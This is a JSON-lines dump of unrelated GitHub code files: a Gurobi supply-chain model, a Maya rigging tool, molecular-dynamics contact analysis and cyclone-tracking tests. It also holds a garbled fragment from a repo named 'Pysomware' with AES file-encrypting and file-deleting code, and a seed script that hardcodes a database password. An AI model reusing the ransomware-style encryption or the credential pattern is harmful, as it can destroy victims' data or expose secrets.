range(Distribution), range(Market), vtype = GRB.CONTINUOUS)\n w_s = grbModel.addVars(range(num_Scenarios), range(Market), range(Products), vtype = GRB.CONTINUOUS)\n \n\n SetGrb_Obj(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products)\n ModelCons(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products)\n\ndef SolveModel(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products):\n grbModel.params.OutputFlag = 0\n grbModel.params.timelimit = 900\n start_time = time.time()\n grbModel.optimize()\n #gap = grbModel.MIPGAP\n # get variable values\n v_val_x_i = grbModel.getAttr('x', x_i)\n v_val_x_j = grbModel.getAttr('x', x_j)\n v_val_U_km = grbModel.getAttr('x', U_km) \n v_val_Q_im = grbModel.getAttr('x', Q_im)\n v_val_Y_ijm = grbModel.getAttr('x', Y_ijm)\n v_val_Z_jkm = grbModel.getAttr('x', Z_jkm) \n v_val_w = grbModel.getAttr('x', w_s)\n\n Summary_dict['ObjVal'] = np.round(grbModel.objval,2)\n Summary_dict[\"OpenMPs\"] = np.sum(v_val_x_i.values())\n Summary_dict[\"OpenDCs\"] = np.sum(v_val_x_j.values())\n Cost_dict[\"Opening\"] = get_opening_costs(instance, v_val_x_i, v_val_x_j, Manufacturing_plants, Distribution)\n Cost_dict[\"f4\"] = np.round(get_rl_rate(v_val_w, instance, num_Scenarios, Market, Products), 2)\n\n for s in range(num_Scenarios):\n Summary_dict[\"Production_\" + str(s)] = sum([v_val_Q_im[(s,m,i)] for m in range(Products) for i in range(Manufacturing_plants)])\n Summary_dict[\"LostSales_\" + str(s)] = sum([v_val_U_km[(s,k,m)] for m in range(Products) for k in range(Market)])\n\n for s in range(num_Scenarios):\n Cost_dict[\"InHouseShipping_\" + str(s)] = get_shipping_costs(instance, s, v_val_Y_ijm, v_val_Z_jkm, Manufacturing_plants, Distribution, Products, Market)\n Cost_dict[\"Production_\" + str(s)] = get_production_cost(instance, s,v_val_Q_im, Manufacturing_plants, Products)\n Cost_dict[\"LostSales_\" + str(s)] = get_lost_cost(instance, s,v_val_U_km, Market, Products) \n\n f1_cost = 0\n f3_cost = 0\n for s in range(num_Scenarios):\n f1_cost += (Cost_dict['Production_' + str(s)] + Cost_dict['InHouseShipping_' + str(s)])\n f3_cost += Cost_dict['LostSales_' + str(s)]\n Cost_dict[\"f1\"] = np.round(Cost_dict[\"Opening\"] + f1_cost/num_Scenarios, 2) # in house (opening + production + shipping)\n Cost_dict[\"f3\"] = np.round(f3_cost/num_Scenarios, 2) # lost sales\n Summary_dict['Demand_met'] = np.mean([(Summary_dict[\"Production_\" + str(s)])/np.sum(demand[instance][s]) for s in range(num_Scenarios)])\n\n\n #print(\"obj val: \", Summary_dict['ObjVal'])\n #print(\"Opening Decisions: \", sum(v_val_x_i.values()), sum(v_val_x_j.values()))\n #print('In house Cost: ', Cost_dict[\"f1\"])\n #print('Lost Sales: ', Cost_dict[\"f3\"])\n #print('Demand Penalties: ', Cost_dict[\"f4\"])\n #print('Demand being met: ', Summary_dict['Demand_met'])\n #print('Gap: ', gap)\n \n return\n\n# Objective\n\ndef SetGrb_Obj(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products):\n grb_expr = LinExpr()\n\n # Cost of opening\n OC_1 = 0\n OC_2 = 0\n for i in range(Manufacturing_plants):\n OC_1 += f_i[instance][i]*x_i[i]\n for j in range(Distribution):\n OC_2 += f_j[instance][j]*x_j[j]\n\n total_shipment = 0\n total_pr_cost = 0\n total_l_cost = 0\n\n # Shipment\n\n for s in range(num_Scenarios):\n ship_1 = 0\n ship_2 = 0\n for i in range(Manufacturing_plants):\n for j in range(Distribution):\n for m in range(Products):\n ship_1 += Transportation_i_j[instance][m][i][j]*Y_ijm[s,m,i,j]\n\n for j in range(Distribution):\n for k in range(Market):\n for m in range(Products):\n ship_2 += Transportation_j_k[instance][m][j][k]*Z_jkm[s,m,j,k]\n \n total_shipment += (ship_1 + ship_2)\n\n # Production\n pr_cost = 0\n for i in range(Manufacturing_plants):\n for m in range(Products):\n pr_cost += Manufacturing_costs[instance][i][m]*Q_im[s,m,i]\n\n total_pr_cost += pr_cost \n\n #Lost Sales\n l_cost = 0\n for k in range(Market):\n for m in range(Products):\n l_cost += lost_sales[instance][k][m]*U_km[s,k,m]\n\n total_l_cost += l_cost\n\n # Percentage of demand met\n rl_penalty = 0\n for s in range(num_Scenarios):\n for k in range(Market):\n for m in range(Products):\n rl_penalty += lost_sales[instance][k][m]*w_s[s,k,m]*demand[instance][s][m][k]\n\n grb_expr += objWeights['f1']*(OC_1 + OC_2 + (total_shipment + total_pr_cost + total_l_cost)/num_Scenarios) + objWeights['f2']*rl_penalty/num_Scenarios\n\n grbModel.setObjective(grb_expr, GRB.MINIMIZE)\n\n return\n\n # Model Constraints\n\ndef ModelCons(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products):\n\n # Network Flow\n\n grbModel.addConstrs(Q_im[s,m,i] >= quicksum(Y_ijm[s,m,i,j] for j in range(Distribution))\n for s in range(num_Scenarios) for i in range(Manufacturing_plants) for m in range(Products))\n\n grbModel.addConstrs(quicksum(Y_ijm[s,m,i,j] for i in range(Manufacturing_plants)) >= quicksum(Z_jkm[s,m,j,k] for k in range(Market))\n for s in range(num_Scenarios) for j in range(Distribution) for m in range(Products))\n\n grbModel.addConstrs(quicksum(Z_jkm[s,m,j,k] for j in range(Distribution)) + \n U_km[s,k,m] >= demand[instance][s][m][k] for s in range(num_Scenarios) for m in range(Products)\n for k in range(Market)) \n\n # Capacity Constraints\n grbModel.addConstrs(quicksum(volume[instance][m]*Q_im[s,m,i] for m in range(Products)) <= Scenarios[instance][s][0][i]*Capacities_i[instance][i]*x_i[i]\n for s in range(num_Scenarios) for i in range(Manufacturing_plants))\n\n grbModel.addConstrs(quicksum(volume[instance][m]*Y_ijm[s,m,i,j] for i in range(Manufacturing_plants) for m in range(Products)) <=\n Scenarios[instance][s][1][j]*Capacities_j[instance][j]*x_j[j] for s in range(num_Scenarios) for j in range(Distribution)) \n\n # Resilience Metric (w = % of rl being missed)\n grbModel.addConstrs(w_s[s,k,m] >= rl - (1 - U_km[s,k,m]/demand[instance][s][m][k]) for s in range(num_Scenarios) for k in range(Market) for m in range(Products))\n\n return\n\ndef get_opening_costs(instance, x1, x2, Manufacturing_plants, Distribution):\n\n # Cost of opening\n OC_1 = 0\n OC_2 = 0\n for i in range(Manufacturing_plants):\n OC_1 += f_i[instance][i]*x1[i]\n for j in range(Distribution):\n OC_2 += f_j[instance][j]*x2[j]\n\n Opening = np.round(OC_1 + OC_2)\n\n return(Opening)\n\ndef get_shipping_costs(instance, scen, Y, Z, Manufacturing_plants, Distribution, Products, Market):\n ship_1 = 0\n ship_2 = 0 \n\n # Shipment\n for i in range(Manufacturing_plants):\n for j in range(Distribution):\n for m in range(Products):\n ship_1 += Transportation_i_j[instance][m][i][j]*Y[scen, m,i,j]\n\n for j in range(Distribution):\n for k in range(Market):\n for m in range(Products):\n ship_2 += Transportation_j_k[instance][m][j][k]*Z[scen,m,j,k] \n\n in_house_shipping = np.round(ship_1 + ship_2)\n\n return(in_house_shipping)\n\ndef get_production_cost(instance, scen, Q, Manufacturing_plants, Products):\n\n # Production\n pr_cost = 0\n for i in range(Manufacturing_plants):\n for m in range(Products):\n pr_cost += Manufacturing_costs[instance][i][m]*Q[scen,m,i]\n\n return(np.round(pr_cost))\n\n\ndef get_lost_cost(instance, scen, U, Market, Products):\n\n #Lost Sales\n l_cost = 0\n for k in range(Market):\n for m in range(Products):\n l_cost += lost_sales[instance][k][m]*U[scen,k,m]\n\n return(np.round(l_cost))\n\n\ndef get_rl_rate(w, instance, num_Scenarios, Market, Products):\n rl_penalty = 0\n for s in range(num_Scenarios):\n for k in range(Market):\n for m in range(Products):\n rl_penalty += lost_sales[instance][k][m]*w[s,k,m]*demand[instance][s][m][k]\n\n return(rl_penalty/num_Scenarios)\n\ndef PrintToFileSummaryResults(rl):\n results_file = \"/home/dkabe/SC_Resilience/Output/results2.txt\"\n ff = open(results_file, \"a\")\n ff.write(str(rl) + '\\t')\n ff.write(str(Summary_dict['ObjVal']) + '\\t' + str(Cost_dict['f1']) + '\\t' + str(Cost_dict['f3']) + '\\t' + str(Cost_dict['f4']) + '\\t')\n ff.write(str(Summary_dict['Demand_met']) + '\\t')\n ff.write(str(Summary_dict['OpenMPs']) + '\\t' + str(Summary_dict['OpenDCs']) + '\\t')\n ff.write('\\n')\n ff.close()\n return\n\n\ndef run_Model(rl, instance=1, num_Scenarios=192, Manufacturing_plants=6, Distribution=4, Market=29, Products=3, objDict={'f1': 1, 'f2': 1}):\n for key, value in objDict.items():\n objWeights[key] = value\n\n SetGurobiModel(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products)\n SolveModel(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products)\n PrintToFileSummaryResults(rl)\n","repo_name":"dkabe/SC_Resilience","sub_path":"Stochastic_model/Val_Resilience.py","file_name":"Val_Resilience.py","file_ext":"py","file_size_in_byte":13402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70606882399","text":"import glob\nimport os, struct\nfrom Cryptodome.Cipher import AES\n\n\ndef encrypt_file(key, in_filename, out_filename=None, chunksize=64 * 1024):\n if not out_filename:\n out_filename = in_filename + '.enc'\n\n iv = os.urandom(16)\n encryptor = AES.new(key, AES.MODE_CBC, iv)\n filesize = os.path.getsize(in_filename)\n\n with open(in_filename, 'rb') as infile:\n with open(out_filename, 'wb') as outfile:\n outfile.write(struct.pack(' ' + filename)\n decrypt_file(key, filename)\n os.remove(filename)","repo_name":"chekestreko/Pysomware","sub_path":"decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70013391840","text":"import maya.cmds as mc\n\nimport maya.OpenMaya as OpenMaya\n\nimport glTools.utils.base\nimport glTools.utils.mesh\nimport glTools.utils.stringUtils\nimport glTools.utils.surface\n\ndef autoRivet(createRivetTransform=True,suffix='rvt'):\n\t'''\n\t'''\n\t# Get User Selection\n\tsel = mc.ls(sl=1)\n\t# Check Selection\n\tif not len(sel) == 2:\n\t\traise Exception('Select object to rivet and then the target mesh!')\n\t\n\t# Determine rivet object and mesh\n\trvtObj = sel[0]\n\tmesh = sel[1]\n\tprefix = glTools.utils.stringUtils.stripSuffix(rvtObj)\n\t\n\t# Get rivet object position\n\tpos = glTools.utils.base.getPosition(rvtObj)\n\tpt = OpenMaya.MPoint(pos[0],pos[1],pos[2],1.0)\n\t\n\t# Get closest face on mesh\n\tfaceId = glTools.utils.mesh.closestFace(mesh,pos)\n\t\n\t# =========================\n\t# - Determine Rivet Edges -\n\t# =========================\n\t\n\tedgeId1 = -1\n\tedgeId2 = -1\n\t\n\t# Create MItMeshEdge\n\tedgeIter = glTools.utils.mesh.getMeshEdgeIter(mesh)\n\t\n\t# Create edgeId MScriptUtil\n\tedgeIdUtil = OpenMaya.MScriptUtil()\n\tedgeIdUtil.createFromInt(0)\n\tedgeIdPtr = edgeIdUtil.asIntPtr()\n\t\n\t# Get face edges\n\tfaceEdges = glTools.utils.mesh.getFaceEdgeIndices(mesh,faceId)\n\t\n\t# Get closest edge\n\tmaxDist = 9999.0\n\tfor edgeId in faceEdges:\n\t\tedgeIter.setIndex(edgeId,edgeIdPtr)\n\t\tedgePt = edgeIter.center(OpenMaya.MSpace.kWorld)\n\t\tedgeDist = (edgePt - pt).length()\n\t\tif edgeDist < maxDist:\n\t\t\tedgeId1 = edgeId\n\t\t\tmaxDist = edgeDist\n\t\n\t# Set current edge\n\tedgeIter.setIndex(edgeId1,edgeIdPtr)\n\t\n\t# Get opposing edge\n\tfaceEdges.remove(edgeId1)\n\tfor edgeId in faceEdges:\n\t\tedgeId2 = edgeId\n\t\t# Check edge connectivity\n\t\tif not edgeIter.connectedToEdge(edgeId): break\n\t\n\t# ========================\n\t# - Create Utility Nodes -\n\t# ========================\n\t\n\t# Rivet Edge 1\n\tedgeCrv1 = prefix+'_edge'+str(edgeId1)+'_rivet_curveFromMeshEdge'\n\tif not mc.objExists(edgeCrv1):\n\t\tedgeCrv1 = mc.createNode('curveFromMeshEdge',n=edgeCrv1)\n\t\tmc.setAttr(edgeCrv1+'.edgeIndex[0]',edgeId1)\n\t\tmc.connectAttr(mesh+'.worldMesh[0]',edgeCrv1+'.inputMesh',f=True)\n\t\n\t# Rivet Edge 2\n\tedgeCrv2 = prefix+'_edge'+str(edgeId2)+'_rivet_curveFromMeshEdge'\n\tif not mc.objExists(edgeCrv2):\n\t\tedgeCrv2 = mc.createNode('curveFromMeshEdge',n=edgeCrv2)\n\t\tmc.setAttr(edgeCrv2+'.edgeIndex[0]',edgeId2)\n\t\tmc.connectAttr(mesh+'.worldMesh[0]',edgeCrv2+'.inputMesh',f=True)\n\t\t\n\t# Rivet Loft\n\trivetLoft = prefix+'_face'+str(faceId)+'_rivet_loft'\n\tif not mc.objExists(rivetLoft):\n\t\trivetLoft = mc.createNode('loft',n=rivetLoft)\n\t\tmc.connectAttr(edgeCrv1+'.outputCurve',rivetLoft+'.inputCurve[0]',f=True)\n\t\tmc.connectAttr(edgeCrv2+'.outputCurve',rivetLoft+'.inputCurve[1]',f=True)\n\t\n\t# Rivet Point on Surface Info\n\trivetPosi = prefix+'_face'+str(faceId)+'_rivet_pointOnSurfaceInfo'\n\trivetPosi = mc.createNode('pointOnSurfaceInfo',n=rivetPosi)\n\tmc.connectAttr(rivetLoft+'.outputSurface',rivetPosi+'.inputSurface')\n\t\n\t# ===========================\n\t# - Get Rivet UV Parameter -\n\t# ===========================\n\t\n\t# Build Temp Surface\n\ttmpSrfShape = mc.createNode('nurbsSurface')\n\ttmpSrf = mc.listRelatives(tmpSrfShape,p=True,pa=True)[0]\n\tmc.connectAttr(rivetLoft+'.outputSurface',tmpSrfShape+'.create',f=True)\n\t\n\t# Get closest point on surface\n\tuv = glTools.utils.surface.closestPoint(tmpSrf,pos)\n\t\n\t# Set rivet parameter\n\tmc.setAttr(rivetPosi+'.parameterU',uv[0])\n\tmc.setAttr(rivetPosi+'.parameterV',uv[1])\n\t\n\t# Delete Temp Surface\n\tmc.delete(tmpSrf)\n\t\n\t# ==========================\n\t# - Attach Rivet Transform -\n\t# ==========================\n\t\n\t# Determine rivet transform\n\trvtTransform = rvtObj\n\tif createRivetTransform: rvtTransform = mc.group(em=True,n=prefix+'_rvt')\n\t\n\t# Connect rivet transform\n\tmc.connectAttr(rivetPosi+'.position',rvtTransform+'.t',f=True)\n\t\n\t# Parent to rivet transform\n\tif createRivetTransform: mc.parent(rvtObj,rvtTransform)\n\t\n\t# =================\n\t# - Return Result -\n\t# =================\n\t\n\treturn rvtTransform\n","repo_name":"auqeyjf/pubTool","sub_path":"glTools-master/tools/autoRivet.py","file_name":"autoRivet.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"74867806237","text":"from sqlalchemy.orm import Session\n\nfrom Model import Comment, Translation, Language, Category\n\nfrom sqlalchemy import create_engine\nengine = create_engine(\"postgresql://postgres:mat610@localhost/discuss\")\n\n\nsession = Session(bind=engine)\n# session = sessionmaker(bind=engine)\n\n# init_sqlalchemy()\ncategories = [\n Category(name='Children'),\n Category(name='Cars'),\n Category(name='Jokes'),\n Category(name='Religion'),\n Category(name='Philosophy'),\n Category(name='Leadership'),\n Category(name='Marriage'),\n Category(name='Cooking'),\n Category(name='Technology'),\n Category(name='Spiritual')\n]\n\nlanguages = [\n Language(name='Spanish', code=\"SP\"),\n Language(name='French', code='FR'),\n Language(name='German', code='GR')\n]\n\ncomments = [\n Comment(comment='I know what I am doing!', category_id=6, score=0),\n Comment(comment='I want to pupu!', category_id=1, score=0),\n Comment(comment='Toyota is my best car', category_id=2, score=0),\n Comment(comment='I love shits', category_id=3, score=0),\n Comment(comment='He is a devoted man', category_id=4, score=0),\n Comment(comment='Wishes are not horses', category_id=5, score=0),\n Comment(comment='My wife is my best friend', category_id=7, score=0),\n Comment(comment='I love Nigeria jollof', category_id=8, score=0),\n Comment(comment='You have to learn the version 12.3.0', category_id=9, score=0),\n Comment(comment='I can see the hidden things of your mind', category_id=10, score=0),\n Comment(comment='This is just an extra joke', category_id=3, score=0)\n]\n\ntranslations = [\n Translation(translation='Js affsdf meea takaf sf', comment_id=1, language_id=1),\n Translation(translation='Int pas me de vo', comment_id=1, language_id=2),\n Translation(translation='Yusss maytt tos', comment_id=1, language_id=3),\n Translation(translation='JIngro dosh', comment_id=2, language_id=1),\n Translation(translation='Maya na dos viszoz', comment_id=2, language_id=2),\n Translation(translation='Jytto pa senta', comment_id=2, language_id=3),\n]\n\nsession.bulk_save_objects(categories)\nsession.bulk_save_objects(languages)\nsession.bulk_save_objects(comments)\nsession.bulk_save_objects(translations)\nsession.commit()\n","repo_name":"andela-onnenanya/discuss","sub_path":"bulkLoad.py","file_name":"bulkLoad.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38533697131","text":"import csv\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_context(\"talk\", font_scale=1.4)\nsns.set_style(\"whitegrid\")\nimport statistics\n\nfrom scipy.stats import ttest_ind_from_stats\n\ndef plot_compare():\n\tx = []\n\ty = [] \n\txerr = []\n\tyerr = []\n\ti = j = 0\n\twith open('data.tsv','r') as tsvin:\n\t\tfile = csv.reader(tsvin, delimiter='\\t')\n\t\tfor row in file:\n\t\t\tzero_var = ((float(row[2]) == 0) & (float(row[5]) == 0))\n\t\t\tif (not zero_var):\n\t\t\t\ttry: \n\t\t\t\t\ttest_result = ttest_ind_from_stats(float(row[1]), float(row[2]), float(row[3]), float(row[4]), float(row[5]), float(row[6]), equal_var=False)\n\t\t\t\texcept ZeroDivisionError:\n\t\t\t\t\tprint('Oops! ERROR') \n\n\t\t\ti = i + 1\n\t\t\tto_small = (float(row[1]) < 5) & (float(row[4]) < 5)\n\t\t\tif ((test_result[1] < 0.05) & ((not to_small) & (not zero_var))):\n\t\t\t\tif ('AP8' in row[0]):\n\t\t\t\t\tj = j + 1\n\t\t\t\tx.append(float(row[1]))\n\t\t\t\ty.append(float(row[4]))\n\t\t\t\txerr.append(float(row[2]))\n\t\t\t\tyerr.append(float(row[5]))\n\n\tprint(i)\n\tprint(len(x))\n\tprint(j)\n\t#plt.scatter(x, y, alpha=0.5)\n\tplt.errorbar(x, y, xerr=xerr, yerr=yerr, fmt='o')\n\tplt.xlabel('contact % (G103E)')\n\tplt.ylabel('contact % (+AP8 G103E)')\n\tplt.ylim([0, 100])\n\tplt.xlim([0, 100])\n\tplt.show()\n\n\ndef run_filter(input_file='data.tsv', save_name='data_filtered_p10.tsv'):\n\tout = filter_compare(input_file)\n\twith open(save_name, 'w') as csvout:\n\t\tcsvout = csv.writer(csvout, delimiter='\\t')\n\t\tfor row in out:\n\t\t\tcsvout.writerow(row)\n\treturn out\n\ndef filter_compare(input_file, p_value = 0.10):\n\tfiltered = []\n\twith open(input_file,'r') as tsvin:\n\t\ttsvin = csv.reader(tsvin, delimiter='\\t')\n\t\tfor row in tsvin:\n\t\t\tzero_var = ((float(row[2]) == 0) & (float(row[5]) == 0))\n\t\t\tif (not zero_var):\n\t\t\t\ttest_result = ttest_ind_from_stats(float(row[1]), float(row[2]), float(row[3]), float(row[4]), float(row[5]), float(row[6]), equal_var=False)\n\t\t\tto_small = (float(row[1]) < 5) & (float(row[4]) < 5)\n\t\t\tif ((test_result[1] < p_value) & ((not to_small) & (not zero_var))):\n\t\t\t\t#write row out\n\t\t\t\tif (float(row[1]) < float(row[4])):\n\t\t\t\t\tif (float(row[1]) == 0):\n\t\t\t\t\t\tratio = -1000\n\t\t\t\t\telse:\n\t\t\t\t\t\tratio = -float(row[4])/float(row[1])\n\t\t\t\telse:\n\t\t\t\t\tif (float(row[4]) == 0):\n\t\t\t\t\t\tratio = 1000\n\t\t\t\t\telse:\n\t\t\t\t\t\tratio = float(row[1])/float(row[4])\n\n\t\t\t\titem = [row[0], row[1][0:6], row[2][0:6], row[3][0:6], row[4][0:6], row[5][0:6], row[6][0:6], ratio]\n\t\t\t\tfiltered.append(item)\n\n\tout = sorted(filtered, key=lambda x: abs(x[7]), reverse=True)\n\treturn out\n\t\n\t\t\t\t\t\n\ndef run_compare(conditions,name):\n\tout = compare_conditions(conditions)\n\twith open(name, 'w') as csvfile:\n\t\tcsvout = csv.writer(csvfile, delimiter='\\t')\n\t\tfor row in out:\n\t\t\tprint(row)\n\t\t\tcsvout.writerow(row)\n\treturn out\n\ndef run_compare_test():\n\t'''\n\tTest the computation of average and stardard deviation for 2 conditions\n\t'''\n\tcondition1 = ['testing/test1_contacts.tsv','testing/test2_contacts.tsv']\n\tcondition2 = ['testing/test1_contacts.tsv','testing/test3_contacts.tsv']\n\tout = run_compare([condition1, condition2], 'testing/dataout.tsv')\n\ttest = [['v--A--A', 100.0, 0.0, 2, 50.0, 70.71067811865476, 2],\n\t['v--C--C', 37.5, 17.67766952966369, 2, 37.5, 17.67766952966369, 2],\n\t['v--B--B', 25.0, 35.35533905932738, 2, 50.0, 0.0, 2]]\n\tfor i in range(0,3): \n\t\tif (out[i] != test[i]):\n\t\t\tprint('Test Failed')\n\t\t\treturn\n\tprint('Test Passed')\n\n\ndef compare_conditions(condition_files):\n\t'''\n\tInput list of list of strings, each list is strings for file names of condition\n\t\t[['1/file1.txt', '1/file2.txt'], ['2/file1.txt', '2/file2.txt']]\n\tOutput: list of lists \n\t\teach list contains [interaction key, freq in 1, std in 1, freq in 2, std in 2, ...]\n\tnote the statistics module gives a correct standard deviation (1/N-1 for the averaging)\n\t'''\n\tconditions = []\n\tall_keys = []\n\tfor files in condition_files:\n\t\tdata = frequencies_over_reps(files)\n\t\tconditions.append(data)\n\t\tall_keys.append(data.keys())\n\n\tunique_keys = set().union(*all_keys)\n\n\tcompare = []\n\tfor key in unique_keys:\n\t\tkeyitem = [key]\n\t\tfor i in range(0, len(condition_files)):\n\t\t\tfreq = conditions[i].get(key, [0, 0, 0, 0, 0])\n\t\t\tnobs = len(condition_files[i])\n\t\t\tfreq = fill_blanks(freq, nobs)\n\t\t\tkeyitem.append(statistics.mean(freq))\n\t\t\tkeyitem.append(statistics.stdev(freq))\n\t\t\tkeyitem.append(nobs)\n\t\tcompare.append(keyitem)\n\n\t#sort values by the mean frequency of the first condition\n\tout = sorted(compare, key=lambda x: x[1], reverse=True)\n\n\treturn out\n\ndef fill_blanks(partial_list, expected_length):\n\tfor i in range(0, expected_length-len(partial_list)):\n\t\tpartial_list.append(0)\n\treturn partial_list\n\ndef Union(lst1, lst2):\n final_list = list(set(lst1) | set(lst2))\n return final_list\n\ndef frequencies_over_reps(files):\n\t\"\"\"\n\toutput dictionairy of contacts\n\tkey is contact key type--atom1--atom2\n\tvalue is list of frequencies for each replicate\n\t\"\"\"\n\ttotals = {}\n\tfor file in files:\n\t\tfile = open(file, \"r\")\n\t\tout = frequencies_from_contacts(file)\n\t\t#aggregate with previous\n\t\tfor key in out:\n\t\t\tif (key in totals): \n\t\t\t\ttotals[key].append(out[key])\n\t\t\telse: \n\t\t\t\ttotals[key] = [out[key]]\n\n\treturn totals\n\ndef frequencies_from_contacts(f):\n\t\"\"\"\n\tfile = open(\"ternary_AP8_MK6_G103E_v1_1_contacts.tsv\", \"r\")\n\tcompute_frequencies(file)\n\n\tParameters\n\t\tf: an open file\n\tReturns\n\t\tdictionairy mapping contact to frequency\n\t\"\"\"\n\t#read f to the list format\n\tall_contacts, nframes = parse_contacts(f)\n\tf.close()\n\tcounts = {}\n\tfor item in all_contacts:\n\t\tkey = item[1]+'--'+item[2]+'--'+item[3]\n\t\tif (key in counts): \n\t\t\tcounts[key] = counts[key] + 1\n\t\telse: \n\t\t\tcounts[key] = 1\n\n\tfrequency = {k: v*100.0/nframes for k, v in counts.items()}\n\treturn frequency\n\n\n\ndef parse_contacts(input_lines, itypes=None):\n \"\"\"\n Read a contact-file (tab-separated file with columns: frame, i-type, atomid1, atomid2[, atomid3[, atomid4]] and\n return it as a list of lists with frames converted to ints. The total number of frames is also returned.\n Example\n -------\n parse_contacts([\n \"# total_frames:2\\n\",\n \"0 hbbb A:ALA:1:N A:THR:10:O\\n\",\n \"0 vdw A:ALA:1:CB B:CYS:3:H\\n\",\n \"1 vdw A:ALA:1:N A:THR:10:C\\n\"\n ])\n # returns:\n # ([\n # [0, \"hbbb\", \"A:ALA:1:N\", \"A:THR:10:O\"],\n # [0, \"vdw\", \"A:ALA:1:CB\", \"B:CYS:3:H\"],\n # [1, \"vdw\", \"A:ALA:1:N\", \"A:THR:10:C\"]\n # ], 2)\n Parameters\n ----------\n input_lines: iterable\n Iterator of over a set of strings. Can be a file-handle\n itypes: set of str | None\n Interactions to include in the output\n Returns\n -------\n (list of list, int)\n The list of interactions and the total number of frames\n \"\"\"\n ret = []\n total_frames = 0\n for line in input_lines:\n line = line.strip()\n if \"total_frames\" in line:\n tokens = line.split(\" \")\n total_frames = int(tokens[1][tokens[1].find(\":\")+1:])\n\n if len(line) == 0 or line[0] == \"#\":\n continue\n\n tokens = line.split(\"\\t\")\n tokens[0] = int(tokens[0])\n\n if itypes is None or tokens[1] in itypes:\n ret.append(tokens)\n\n return ret, total_frames\n\nif __name__== \"__main__\":\n\t#run_compare_test()\n\t#plot_compare()\n\trun_filter()\n","repo_name":"lxpowers33/md_utils","sub_path":"md_contacts.py","file_name":"md_contacts.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16825058468","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nTest case 5\r\n\r\nApply VDG algorithm on ARPEGE forecast on a tropical cyclone (Freddy, February 2023).\r\nRequired inputs :\r\n - inputdef file ./inputs/indef_testcase5.json\r\n - algodef file ./inputs/algo_testcase5.json\r\n - reference input file (that has been processed from https://www.ncei.noaa.gov/data/international-best-track-archive-for-climate-stewardship-ibtracs/v04r00/access/csv/ibtracs.last3years.list.v04r00.csv)\r\n - data files /cnrm/recyf/NO_SAVE/Data/users/plu/TRAJECT/ARPfc/vdg/grid*.grib (as specified in inputdef file)\r\n\r\nExpected outputs (in ./test5/):\r\n - track file track_test_case5.json\r\n - figure file track_test_case5.png\r\n\r\n\"\"\"\r\n\r\nfrom traject import *\r\n\r\n#Epygram environment\r\nimport epygram\r\nepygram.init_env()\r\nos.environ[\"ECCODES_SAMPLES_PATH\"]=(\"/home/common/epygram/ext/eccodes/share/eccodes/samples\")\r\n\r\n#Directory\r\nrepin='./inputs/'\r\nrepout='./test5/'\r\n\r\ntimeref={'start':\"2023021700\",'final':\"2023022300\",'step':\"06\"}\r\ndiags=[\"mslp_min\",\"ff10m_max\"]\r\n\r\n#If you want to apply this case on another cyclone, then get input reference file from IbTracs (https://www.ncei.noaa.gov/data/international-best-track-archive-for-climate-stewardship-ibtracs/v04r00/access/csv/ibtracs.last3years.list.v04r00.csv) and uncomment the following lines:\r\ncycname=\"FREDDY\"\r\nibfile=repin+\"ibtracs_\"+cycname+\".json\" #Reference input file\r\nif False:\r\n domtraj={\"lonmin\":-30.0,\"lonmax\":90.0,\"latmin\":-40.0,\"latmax\":-5.0} #same as indef_testcase5.json\r\n lref=ConvertIBTRACS(\"./ibtracs.last3years.list.v04r00.csv\",timeref,domtraj,diags=diags)\r\n mslp_thr=1010.0 #Threshold (hPa) to keep the track\r\n for traj in Select(lref,{\"name\":cycname}):\r\n print(traj.name,traj.basetime)\r\n mini = traj.tmin(\"mslp_min\")/100.0\r\n if mini 0:\n left_group_pivot_df = comparison_df.loc[:, [i for i in comparison_df if i.split(\"_\")[0] == left_group_name and i.split(\"_\")[1].startswith(\"/\")]]\n right_group_pivot_df = comparison_df.loc[:, [i for i in comparison_df if i.split(\"_\")[0] == right_group_name and i.split(\"_\")[1].startswith(\"/\")]]\n comparison_dir = \"{a}{b}/\".format(a=output_dir, b=comparison_string)\n os.makedirs(comparison_dir, exist_ok=True)\n comparison_df.to_csv(path_or_buf=\"{}pivot.tsv\".format(comparison_dir), sep='\\t', header=True, index=True)\n left_group_pivot_df.to_csv(path_or_buf=\"{a}raw_{b}.tsv\".format(a=comparison_dir, b=left_group_name), sep='\\t', header=True, index=True)\n right_group_pivot_df.to_csv(path_or_buf=\"{a}raw_{b}.tsv\".format(a=comparison_dir, b=right_group_name), sep='\\t', header=True, index=True)\n boxplots_dir = \"{}boxplots/\".format(comparison_dir)\n os.makedirs(boxplots_dir, exist_ok=True)\n for base_id in comparison_df.index.tolist():\n annotated_id = comparison_df.loc[base_id, annotation_col_name]\n # NaN is float type\n if not isinstance(annotated_id, str):\n annotated_id = comparison_df.loc[base_id, \"former_id\"]\n self._draw_boxplot(left_list=left_group_pivot_df.loc[base_id].values.tolist(),\n right_list=right_group_pivot_df.loc[base_id].values.tolist(),\n left_name=left_group_name,\n right_name=right_group_name,\n title=annotated_id,\n output_file=\"{a}{b}.png\".format(a=boxplots_dir, b=base_id))\n","repo_name":"ivasilyev/curated_projects","sub_path":"meta/scripts/PivotTableAnnotator.py","file_name":"PivotTableAnnotator.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31669522279","text":"count_students = int(input())\nall_sum_grades = 